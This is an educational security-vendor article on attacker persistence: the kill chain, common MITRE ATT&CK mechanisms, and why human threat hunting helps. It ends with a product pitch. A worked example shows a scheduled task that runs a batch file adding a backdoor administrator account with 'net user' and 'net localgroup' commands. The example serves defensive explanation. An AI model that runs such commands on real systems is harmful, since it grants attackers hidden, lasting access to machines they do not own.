Success Kit
Persistence in Cybersecurity
Learn about persistence in cybersecurity, including common malware persistence mechanisms and advanced persistent threats (APTs).
This article is from The Defender's Handbook:
A knowledge base for cybersecurity enthusiasts to level up their
cyber knowledge - one article at a time.
Introduction
Persistence has become a go-to attack tactic for today’s threat actors.
As hackers have evolved their tradecraft, they’ve become stealthier—ensuring that they can lurk in their desired environment for as long as they need to accomplish their mission. While other attacks, such as ransomware, are loud and overt, persistence enables attackers to stay hidden - unless defenders know what to look for.
Read on to learn:
- How persistence enables malware - and how defenders can use persistence to get rid of malware
- The key differences between persistence and advanced persistent threats (APTs)
- Where persistence lives in the cyber kill chain
- Common persistence mechanisms
- What persistence looks like
What It Is & How It Works
What is Persistence in Cybersecurity?
Persistence enables malware by allowing the malware to keep running—all while the attacker remains undetected.
Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. Bad actors can place an implant or a “stub” that both evades automated antivirus solutions and kickstarts more malware. This malware is usually hidden in legitimate startup folders or within scheduled tasks and services, making it harder to find.
After you reboot your system or log off and on again, the stub or malware is retriggered to run again. In other words, persistence enables hackers who gain access into your environments to keep it – oftentimes without you knowing they have access in the first place.
How Does Persistence Enable Malware?
Is Persistence Another Word for an Advanced Persistent Threat (APT)?
What is an Example of an Advanced Persistent Threat?
Persistence can be used to keep malware running – and to spread other malware if they so choose. Attackers can use persistent malware to maintain access to a network as they search for the data they want to steal. They also sometimes use persistent malware to conduct other types of shady activity, such as click fraud or cryptojacking.
Malware Detection
Luckily, persistence can help defenders detect malware. When defenders find persistence, they can eliminate it, cutting off the threat actor’s access and stopping attackers in their tracks.It’s important to note that detecting malware is only a temporary solution to the bigger problem: persistence. If defenders don’t find the persistence in the environment, threat actors can simply recirculate the malware. Malware detection treats one symptom without addressing the root problem. That’s why it’s critical to find – and eliminate – persistence.
Persistence-Enabled Attacks: A Technical Deep Dive
Where Persistence Lives in the Cyber Kill Chain
Typically, persistence falls in the middle of the cyber kill chain. After hackers gain access to an environment, their goal is to keep that access without being detected.Below are the five main stages in the cyber kill chain.
1. Reconnaissance
2. Initial Access
3. Persistence
4. Discovery
5. Execution
Goal: Gather as much information as they can.
This step is critical in solidifying an attack's "mission." Any information gathered-whether it's specific vulnerabilities to exploit or users to phish-can be leveraged by the adversary to aid in other phases of their workflow.
What Are Common Malware Persistence Mechanisms?
MITRE ATT&CK®, which compiles information about adversary tactics based on what’s being seen in the real world, has identified 19 different known malware persistence mechanisms that attackers use to lurk in environments undetected. Out of those, we tend to see hackers establish persistence in one of three ways:
1. Boot or Logon Autostart Execution
2. Boot or Logon Initialization Scripts
3. Scheduled Task/Job
This common malware persistence mechanism involves a hacker who abuses a legitimate operating system process—for example, a system reboot or logon. A hacker achieves persistence by adding an entry to the run keys in Windows Registry or the Startup folder. As a result, any referenced programs will be executed when a user logs in.
What Persistence Looks Like
Let’s say, for example, an attacker is able to compromise a system and create a scheduled task that automatically executes the following command every time the machine starts up:cmd /c “start /b
This kicks off a new command prompt in the background.c:\ProgramData\48756e74.bat”
This is the location of the batch file to be executed.At a glance, it's easy to focus on the second half of this command; there's clearly a very unusual-looking file being called. Let’s go ahead and open the file to see what’s inside:net user eviluser “myEvilPassword” /ADD
net localgroup administrators eviluser /ADD
This batch file adds a new backdoor account with administrative privileges.In this case, the challenge an automated security tool would have is validating malicious intent with this scheduled task -and that’s to the benefit of the attacker.Many preventive tools require a high degree of confidence that malicious activity is occurring before stepping in. Creating a username and password through a command line prompt could actually be a legitimate administrative task. Therefore, most security products will allow the action to continue in order to avoid potential disruption for the end user. All the while, the attacker can stealthily hide in the software’s blindspots.This is why persistence is an attacker’s greatest ally. It provides secret, backdoor access that’s hidden within the existing parts of an operating system.
Can Security Tools Find and Eliminate Persistence?
Many companies that produce security tools claim they can find and eliminate persistence through artificial intelligence (AI) and automation. The problem is that persistence, by design, is stealthy to remain undetected. It often accomplishes this by using forms of obfuscation or evasion techniques that automated tools won’t catch.
Humans, on the other hand, have the contextual awareness to see if something doesn’t look right. This is why threat hunting combines innovative technology with human intelligence to identify attacks that are missed by automated security tools alone. Human threat hunters and innovative technology are the dynamic duo that can find and eliminate persistence.
Add Cyber Experts to Your Arsenal
The Huntress Managed Security Platform was designed to detect persistence mechanisms to identify and evict threat actors from your environments. Start your free trial today.
